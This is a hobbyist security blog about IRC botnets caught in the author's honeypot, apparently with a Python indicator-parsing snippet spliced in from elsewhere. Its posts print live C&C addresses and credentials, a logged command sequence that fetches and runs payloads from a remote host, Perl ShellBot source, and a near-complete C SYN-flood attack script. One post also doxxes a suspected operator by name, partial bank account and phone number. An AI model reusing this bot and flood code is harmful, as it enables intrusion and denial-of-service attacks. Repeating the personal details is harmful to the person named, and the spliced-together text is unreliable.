ITS Ownz<br />
hmm, don't really know, but it's about security and stuff like that<br />
Author: bi0 (http://www.blogger.com/profile/14620421761593085083)<br />
<br />
Blue Botnet - topksa.net - Skidd ( kingv ) (2017-04-22)<br />
So another skid tried to infect my honeypot with Blue Bot.<br />
Also here is his C&C:<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">hxxp://topksa.net/WebPanel/login.php
http://topksa.net/WebPanel/visitors.txt
http://topksa.net/WebPanel/botlogger.php 60 bots
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipzlR8bA4jUMDpnckKx-WebNYrCdCcB_-Bpsb3DIe14MzSeHireoocBSs6CLQl4gnJgAG7UK3rhbTf_4Zn52Nl3kOxC8oHSL6zsaelKePiMemv256d6YZZxIT3uKcAdkN1SLrCKi3AQEQ/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipzlR8bA4jUMDpnckKx-WebNYrCdCcB_-Bpsb3DIe14MzSeHireoocBSs6CLQl4gnJgAG7UK3rhbTf_4Zn52Nl3kOxC8oHSL6zsaelKePiMemv256d6YZZxIT3uKcAdkN1SLrCKi3AQEQ/s320/0.png" width="320" /></a> </div>
Well, he is running some bitcoin business; dunno, too bored to translate that, but anyway he provides us an email to him and some bank account numbers, so let's just search more about him, maybe something interesting on Google or Facebook.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEg0jp2xbqZLXmnn2BDk4Sh7rt86KrURrndU_j1f9WSPSZbOKFRiyxr-QSdETxCOzWhh22f7JuuyznM7kdKEtQpJ5ZwJCPZfmp3EtuePKfGech3GmLtBNq0XMft_pecx6YRElofD2BTs/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEg0jp2xbqZLXmnn2BDk4Sh7rt86KrURrndU_j1f9WSPSZbOKFRiyxr-QSdETxCOzWhh22f7JuuyznM7kdKEtQpJ5ZwJCPZfmp3EtuePKfGech3GmLtBNq0XMft_pecx6YRElofD2BTs/s320/1.png" width="320" /></a></div>
So I found his bank account number on some forum that links to his nick,<br />
but he wants to be a legit seller and a good guy, and yeah, he provides us a phone number and his real name of course.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMr0kj6ZfC0fj4qbL2NJYIXib2eoeDt-kB6IfFkA5EMplb5aF8vn6t_NDTofAzLtbEmSyFap8KJgAHvaQLtypDXKuXdOKyVAZ6huNeH4Bb4gm9tcr_1b__2z5B-FWJtH8Hm7eRRUS2tYo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMr0kj6ZfC0fj4qbL2NJYIXib2eoeDt-kB6IfFkA5EMplb5aF8vn6t_NDTofAzLtbEmSyFap8KJgAHvaQLtypDXKuXdOKyVAZ6huNeH4Bb4gm9tcr_1b__2z5B-FWJtH8Hm7eRRUS2tYo/s320/2.png" width="320" /></a></div>
Saad Saleh Rashed<br />
Al Rajhi Account Number / 11860801021****<br />
Mobile 0551858***<br />
Okay, but hopefully that info does not link to his Facebook account... or?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfzABsevAM8lQGTQulkK-tG5tVuyw2fRyhF2omUwNSrvYmJ8Fau03pHJC-PYL5zU0Q7KZkL6421QhCtt68NEP4MENdW-Vy9VfinnuYq0CIgVz3C8RsMZQuD_iaZcEGl1VzZ8Avwj9ZJ-Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfzABsevAM8lQGTQulkK-tG5tVuyw2fRyhF2omUwNSrvYmJ8Fau03pHJC-PYL5zU0Q7KZkL6421QhCtt68NEP4MENdW-Vy9VfinnuYq0CIgVz3C8RsMZQuD_iaZcEGl1VzZ8Avwj9ZJ-Q/s320/3.png" width="320" /></a></div>
Yep! Damn, no pics, but his status says "It's complicated"!! Maybe more on this skid later :) peace.<br />
<br />
IRC - drona.bot.nu - Botnet (2016-12-10)<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Spreading ftp server :
ft*://kobra:kobra@195.234.176.57/
bot config :
////////pbot.php////////
class pBot
{
var $config = array("server" => "112.124.47.140", "port" => "2222", "pass" => "",
"prefix" => "NOU", "maxrand" => "6", "chan" => "#pma", "chan2" => "#pma2",
"key" => "NEW", "modes" => "+pwisx", "password" => "123", "trigger" => ".",
"hostauth" => "ANONYMOUS.XYZ", "limit" => "300"
);
/////////end//////////
</code></pre>
<br />
<br />
Also, at first there is no DNS at this point, to prevent suspension, but as soon as the new infected machine joins IRC, an auto msg from user "w" with an<br />
mrc script commands the bot to download the new bot file:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbvl0HsTWvVsTFyT4-8IgtieKx8rT3mukkJfCx140pLDIeo0-HawB70zG_RSjXAVJLRM2ZMUdHCahpHv9sH_KWo41cd4J9Fs-fJv5jeNdzIZpNj3Z0UKZxgQjeauICH3_i-oIiFlmSClY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
<img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbvl0HsTWvVsTFyT4-8IgtieKx8rT3mukkJfCx140pLDIeo0-HawB70zG_RSjXAVJLRM2ZMUdHCahpHv9sH_KWo41cd4J9Fs-fJv5jeNdzIZpNj3Z0UKZxgQjeauICH3_i-oIiFlmSClY/s320/1.png" width="320" /></a></div>
<br />
Here is the msg from "w":<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ;
curl -O f*p://user:ggallery@66.71.191.82/a.pdf ;
fetch f*p://user:ggallery@66.71.191.82/a.pdf ;
lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .exec cd /dev/shm/;wget ***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;
./autorun;./run;
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start sexy.exe
[20:59] <w> .download ****//lewl.ucoz.site/sexy.exe C:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .exec start C:\sexy.exe
[20:59] <w> .exec del sexy.exe C:\sexy.exe
[20:59] <w> .exec rm -rf sexy.exe C:\sexy.exe perl*
[20:59] <w> .exec cd /dev/shm ;wget f***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./run;
[20:59] <w> .start D:\sexy.exe
[20:59] <w> .start C:\sexy.exe
[20:59] <w> .die
</code></pre>
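To triage a captured session like the one above, an added example (my own code, not from the post or from the bot): it parses the <code>[HH:MM] &lt;nick&gt; .cmd args</code> lines, treats anything that starts with the bot's trigger (<code>.</code>, as in the pBot config above) as a command, and pulls out the hosts contacted, the fetch tools tried, the dropped file paths and which platforms the commands target. The log embedded in it is a constructed sample modelled on the session, with the URLs kept defanged the way the post shows them.

```python
import re
from collections import Counter
from typing import Optional

# Constructed sample modelled on the "<w>" session in the post; URLs stay defanged.
SAMPLE_LOG = r"""[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ; curl -O f*p://user:ggallery@66.71.191.82/a.pdf ; fetch f*p://user:ggallery@66.71.191.82/a.pdf ; lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .die
[21:00] <someone> hello?
"""

LINE_RE = re.compile(r"^\[(?P<time>\d\d:\d\d)\] <(?P<nick>[^>]+)> (?P<text>.*)$")
FETCHERS = {"wget", "curl", "fetch", "lwp-download"}   # the downloaders the bot cycles through
WIN_PATH = re.compile(r"[A-Za-z]:\\[^\s;]+")           # D:\sexy.exe style drop paths
NIX_CUES = ("/tmp", "/dev/shm", "rm -rf", "killall", "perl ", "chmod ")


def host_of(token: str) -> Optional[str]:
    """Host part of a (possibly defanged) URL token, e.g.
    '***://user:pw@66.71.191.82/a.pdf' or '*****/lewl.ucoz.site/sexy.exe'."""
    if "://" not in token and not re.match(r"^\*+/\S", token):
        return None
    rest = re.sub(r"^[A-Za-z*]*:?/+", "", token)   # drop the scheme, whatever it was
    rest = rest.rsplit("@", 1)[-1]                  # drop user:pass@ if present
    host = rest.split("/", 1)[0].split(":", 1)[0]   # drop path and port
    return host or None


def parse_command(text: str, trigger: str = "."):
    """Split '.exec cd /tmp;wget ...' into ('.exec', 'cd /tmp;wget ...')."""
    if not text.startswith(trigger) or len(text) < 2:
        return None
    cmd, _, args = text.partition(" ")
    return cmd, args.strip()


def summarise(log: str, trigger: str = ".") -> dict:
    """Collect IoCs and behaviour hints from every bot command in the log."""
    out = {"commands": Counter(), "hosts": set(), "fetchers": set(),
           "dropped": set(), "platforms": set(), "controllers": set()}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parsed = parse_command(m["text"], trigger)
        if parsed is None:
            continue                        # ordinary chatter, not a command
        cmd, args = parsed
        out["commands"][cmd] += 1
        out["controllers"].add(m["nick"])
        for tok in re.split(r"[\s;]+", args):
            if tok in FETCHERS:
                out["fetchers"].add(tok)
            host = host_of(tok)
            if host:
                out["hosts"].add(host)
        out["dropped"].update(WIN_PATH.findall(args))
        if cmd == ".download" and len(args.split()) == 2:
            out["dropped"].add(args.split()[1])   # .download <url> <destination>
        if WIN_PATH.search(args) or args.startswith(("start ", "del ")):
            out["platforms"].add("windows")
        if any(cue in args for cue in NIX_CUES):
            out["platforms"].add("linux")
    return out


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```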
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh244QNgGgSSWGa_GNDXy_bBnyNtjK8ZG3URwkJw8TD9dWq2U4P07qPZNcp8ctNH_-NZY_WFIhXbzYcWwFEaPeRmJOQdVdduiqj1hZretnSv7u1UKZjyXnK-1kAVN8YLrmKuH0FMfqi2xw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh244QNgGgSSWGa_GNDXy_bBnyNtjK8ZG3URwkJw8TD9dWq2U4P07qPZNcp8ctNH_-NZY_WFIhXbzYcWwFEaPeRmJOQdVdduiqj1hZretnSv7u1UKZjyXnK-1kAVN8YLrmKuH0FMfqi2xw/s320/2.png" width="320" /></a></div>
<br />
Also let's check the ftp: 3 files<br />
<ul>
<li>a.pdf // new bot with the dns</li>
<li>drn.tgz // Linux backdoor and irc bot</li>
<li>gscan.tgz // His personal ZeMu setup</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvdOy_X0nzIRfeaJemAXgLzfAYlwPLvAeaANSow9DchMTjN-IJxIEhktxm5l7eKLV2KuVOD8jmqb_atRMJtqD25sKjBN2eq-AbVlyfOH7crwdtVeRjaT2lw_zMJ3OrUOjqtEgseUE3T3s/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvdOy_X0nzIRfeaJemAXgLzfAYlwPLvAeaANSow9DchMTjN-IJxIEhktxm5l7eKLV2KuVOD8jmqb_atRMJtqD25sKjBN2eq-AbVlyfOH7crwdtVeRjaT2lw_zMJ3OrUOjqtEgseUE3T3s/s320/3.png" width="320" /></a></div>
And in a.pdf we see his real dns, and one photo below too<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQAgfwLwsomlUQ9hDhpwgvoPwYDmcxVFBjMS3rTZrjb3i93jrjyEd6rpjKdFSDJNqPvbAEpPv8rymA3QuFrhTptNyGJ_RGA0S6oY0ajEKVZTc_q5ke7LS6_4QmzDKsYfkpEOCMGa0hHdY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQAgfwLwsomlUQ9hDhpwgvoPwYDmcxVFBjMS3rTZrjb3i93jrjyEd6rpjKdFSDJNqPvbAEpPv8rymA3QuFrhTptNyGJ_RGA0S6oY0ajEKVZTc_q5ke7LS6_4QmzDKsYfkpEOCMGa0hHdY/s320/4.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSwgaNnaXdF5JHAULRuoCFY0_Pbp7_i1RojaQlQGYRTmnM_dDf76s3u_ax7wemnTl-ddaa49XYjMBfeq6hmdvjEKulhvhG9hqcDrP9_nb9yAPHdIKkS8PVvAgRetcAvWPn4pGZ3odKJU/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSwgaNnaXdF5JHAULRuoCFY0_Pbp7_i1RojaQlQGYRTmnM_dDf76s3u_ax7wemnTl-ddaa49XYjMBfeq6hmdvjEKulhvhG9hqcDrP9_nb9yAPHdIKkS8PVvAgRetcAvWPn4pGZ3odKJU/s320/5.png" width="320" /></a></div>
<br />
<br />
// Don't download if you don't know what you're doing .... drn.tgz : <a href="https://www.upload.ee/files/6438413/drn.tgz.html">Sample</a><br />
And sexy.exe is an IRC bot, mIRC based, packed as an SFX archive.<br />
Some files:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP03wqFNIgubTxGR6QfAAAc5EqpQVvXgaOaVNlZOA89vOz7Usmu1zf2TTXu_os5_3w5kRTC2K0udToeSW_bx_SPUT6g5-beyxild5YVuPmZFkq4mopykmzynROM-3o9Tt8jkUtpv8eadw/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP03wqFNIgubTxGR6QfAAAc5EqpQVvXgaOaVNlZOA89vOz7Usmu1zf2TTXu_os5_3w5kRTC2K0udToeSW_bx_SPUT6g5-beyxild5YVuPmZFkq4mopykmzynROM-3o9Tt8jkUtpv8eadw/s320/10.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8W2m1UxnfdeVRmFGDZNdG-UsYeK2YeyXOR-3FAZdMhX4xibPdoThvDVnrh03fml2LhvUTZBYhVGD9QqxfouHyNTlH_aSBic6lMod2yjelMH6dUKP20hrP6mzCiGniaGRcM7xponuyBWc/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8W2m1UxnfdeVRmFGDZNdG-UsYeK2YeyXOR-3FAZdMhX4xibPdoThvDVnrh03fml2LhvUTZBYhVGD9QqxfouHyNTlH_aSBic6lMod2yjelMH6dUKP20hrP6mzCiGniaGRcM7xponuyBWc/s320/11.png" width="320" /></a></div>
<br />
And some other things found on his ftp. Ah yeah, he forgot to give limited access to that ftp user, or was just dumb enough to use the anonymous user... anyways all his shit got rm -f *. If someone is interested in this shit, just email me:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHarR5QDg-GprIsaq7IAxI5Fj0dYbcuPpiiR-dOpuebmMS7byAXDk04v2lOew5ThSwl4oAqgxplHzMEqpd9tHjxScafKpCyqpkkQQPQSmCRSNNzTToirW84WIJW0VWhkUVSuI4cmRdtU0/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHarR5QDg-GprIsaq7IAxI5Fj0dYbcuPpiiR-dOpuebmMS7byAXDk04v2lOew5ThSwl4oAqgxplHzMEqpd9tHjxScafKpCyqpkkQQPQSmCRSNNzTToirW84WIJW0VWhkUVSuI4cmRdtU0/s320/12.png" width="320" /></a></div>
ragebot - scan1.zapto.org - t0nixx [SKID] (2016-11-28)<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc
</code></pre>
5k - Perl/ShellBot.B ddos - IRC (2016-11-19)<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4tTiZFLVF8i748Q0YPpMVyhL0WSgWgs5CtuVGfjmPtRDmNBfC5yX_hyphenhyphenapb7bIS5BfvfNO9aGtQru4A17Qt4dPcZG7HA_OLCqnvRor9qRf8F48A1r_RjfaQ9rqkEQxkjyKVo1H-7JQCWw/s1600/scan.png" imageanchor="1"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4tTiZFLVF8i748Q0YPpMVyhL0WSgWgs5CtuVGfjmPtRDmNBfC5yX_hyphenhyphenapb7bIS5BfvfNO9aGtQru4A17Qt4dPcZG7HA_OLCqnvRor9qRf8F48A1r_RjfaQ9rqkEQxkjyKVo1H-7JQCWw/s320/scan.png" width="320" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQG5ed4rnXSKDXACyI6G6ciLVcAKHaFoi2IeTClcHIwTWP3QSnIcqV9z2DH4YKQ507k0r9IpBei2QyA6AI3yfnejgrQWu5qokPBeJJ3hpYBxJdr0S0f0f-oQTMbUJLq-P_8xlXvJ5AnM8/s1600/3.png" imageanchor="1"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQG5ed4rnXSKDXACyI6G6ciLVcAKHaFoi2IeTClcHIwTWP3QSnIcqV9z2DH4YKQ507k0r9IpBei2QyA6AI3yfnejgrQWu5qokPBeJJ3hpYBxJdr0S0f0f-oQTMbUJLq-P_8xlXvJ5AnM8/s320/3.png" width="320" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTubccw_MmUZBvph2a0o_iw43yVYcgVeSekXEu7XZz-ez1wZiQhsc03nqUgESUwbbzXKGyZWsKrb402actjM-Wi-tdO672r4n_uoqeGnf2OGccbQJ8B_-lpKfGbfjnAibyhIurzCEkWpk/s1600/lol.png" imageanchor="1"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTubccw_MmUZBvph2a0o_iw43yVYcgVeSekXEu7XZz-ez1wZiQhsc03nqUgESUwbbzXKGyZWsKrb402actjM-Wi-tdO672r4n_uoqeGnf2OGccbQJ8B_-lpKfGbfjnAibyhIurzCEkWpk/s320/lol.png" width="320" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
# TeaMrx Perlbot vS xeQT
my @mast3rs = ("Low","Loww");
my @admchan=("#Perli");
$servidor='188.119.151.131' unless $servidor; # his server
my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"spamd child",
"httpd");
my @nickname = ("TeaMrx","......","xQt");
my @xident = ("noway",......yn","ju");
my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");
#################
# Random Ports
#################
my @rports = ("6667");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 - he tries to tell me what I put inside of me - \001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
# xeQt
#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
sub getnick {
return "$nickname[rand scalar @nickname]".int(rand(1000));
}
# need to delete some shit coz the site gets blacklisted
}
</code></pre>
<br />
Ahh, found this in his spreading ftp, maybe interesting to someone....<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res2 = 3;
tcph->doff = 5;
tcph->syn = 1;
tcph->window = htonl(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
